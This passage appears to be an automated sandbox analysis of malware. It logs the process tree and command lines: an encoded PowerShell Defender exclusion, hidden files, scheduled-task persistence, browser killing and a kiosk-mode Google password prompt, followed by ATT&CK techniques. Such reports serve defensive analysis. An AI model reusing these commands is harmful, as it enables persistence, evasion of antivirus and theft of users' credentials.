        "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABqAGcAawB5AHQAMABuAHUAegB6ADQASwBNAFIASABOAFkAQwBPACcA
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2552
      - C:\Users\Admin\AppData\Roaming\jgkyt0nuzz4KMRHNYCO\DJj.exe
        
        "C:\Users\Admin\AppData\Roaming\jgkyt0nuzz4KMRHNYCO\DJj.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
    - - C:\Users\Admin\AppData\Local\Temp\1021352001\141fa64e9f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021352001\141fa64e9f.exe"
        5⤵
        Enumerates VirtualBox registry keys
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2348
    - - C:\Users\Admin\AppData\Local\Temp\1021353001\e50c478749.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021353001\e50c478749.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1700
    - - C:\Users\Admin\AppData\Local\Temp\1021354001\f2258a96f7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021354001\f2258a96f7.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2164
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        6⤵
        Loads dropped DLL
        
        PID:2828
        
        C:\Windows\system32\mode.com
        
        mode 65,10
        7⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
        
        C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        7⤵
        Executes dropped EXE
        
        PID:2884
        
        C:\Windows\system32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        8⤵
        Views/modifies file attributes
        
        PID:2528
        
        C:\Windows\system32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        8⤵
        Views/modifies file attributes
        
        PID:1248
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1684
    - - C:\Users\Admin\AppData\Local\Temp\1021355001\118e2213a8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021355001\118e2213a8.exe"
        5⤵
        Executes dropped EXE
        
        PID:2396
    - - C:\Users\Admin\AppData\Local\Temp\1021356001\05a4c884b7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021356001\05a4c884b7.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1624
      - C:\Users\Admin\AppData\Local\Temp\1021356001\05a4c884b7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021356001\05a4c884b7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1556
    - - C:\Users\Admin\AppData\Local\Temp\1021357001\01664839d8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021357001\01664839d8.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2840
    - - C:\Users\Admin\AppData\Local\Temp\1021358001\9694da05e8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021358001\9694da05e8.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:532
    - - C:\Users\Admin\AppData\Local\Temp\1021359001\9829a32afc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021359001\9829a32afc.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2420
    - - C:\Users\Admin\AppData\Local\Temp\1021360001\e724933356.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021360001\e724933356.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2560
    - - C:\Users\Admin\AppData\Local\Temp\1021361001\11efca6d7c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021361001\11efca6d7c.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2644
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:896
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3008
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2480
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:1432
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:824
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.0.967192030\64185525" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1160 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63aa285c-c1d1-431a-a21b-5163420bf458} 824 "\\.\pipe\gecko-crash-server-pipe.824" 1372 fff1e58 gpu
        8⤵
        
        PID:2792
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.1.645775702\545231748" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {144a17d4-bb87-4f13-98ff-53746e09869f} 824 "\\.\pipe\gecko-crash-server-pipe.824" 1532 42ec158 socket
        8⤵
        
        PID:2700
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.2.451615737\374081940" -childID 1 -isForBrowser -prefsHandle 1940 -prefMapHandle 1936 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39952c24-3523-4c72-82a6-5bbe4c20da71} 824 "\\.\pipe\gecko-crash-server-pipe.824" 1952 1876ac58 tab
        8⤵
        
        PID:2740
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.3.1117414997\104929481" -childID 2 -isForBrowser -prefsHandle 2652 -prefMapHandle 2648 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {313c9472-d19c-4ea8-8b4b-82273a5edc3f} 824 "\\.\pipe\gecko-crash-server-pipe.824" 2672 1c9a6258 tab
        8⤵
        
        PID:1540
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.4.675497839\810629343" -childID 3 -isForBrowser -prefsHandle 3804 -prefMapHandle 3800 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63461b23-7657-4eb3-9603-4e64a244f22f} 824 "\\.\pipe\gecko-crash-server-pipe.824" 3816 2080d558 tab
        8⤵
        
        PID:3564
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.5.1916090797\1464925050" -childID 4 -isForBrowser -prefsHandle 3936 -prefMapHandle 3940 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b25ae3-1e45-4c9d-9f76-c5ffe44a16f6} 824 "\\.\pipe\gecko-crash-server-pipe.824" 3924 2080d858 tab
        8⤵
        
        PID:3572
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="824.6.559250563\11215715" -childID 5 -isForBrowser -prefsHandle 4104 -prefMapHandle 4108 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2d35ab9-a74e-415d-9d14-cef7a8eefc57} 824 "\\.\pipe\gecko-crash-server-pipe.824" 4088 20810558 tab
        8⤵
        
        PID:3584
    - - C:\Users\Admin\AppData\Local\Temp\1021362001\31fbbc958b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021362001\31fbbc958b.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1448
    - - C:\Users\Admin\AppData\Local\Temp\1021363001\6471db0115.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021363001\6471db0115.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in Program Files directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:3748
      - C:\Program Files\Windows Media Player\graph\graph.exe
        
        "C:\Program Files\Windows Media Player\graph\graph.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2564
    - - C:\Users\Admin\AppData\Local\Temp\1021364001\f2abdd8ca0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021364001\f2abdd8ca0.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3080
      - C:\Users\Admin\AppData\Local\Temp\1021364001\f2abdd8ca0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1021364001\f2abdd8ca0.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3144

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1412

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2796

C:\Windows\system32\taskeng.exe
taskeng.exe {11375208-AD2E-4E11-B988-3DFF896F6778} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:996
- C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
  C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:1940
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
    3⤵
    - Drops file in System32 directory
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:764
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.1.10.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion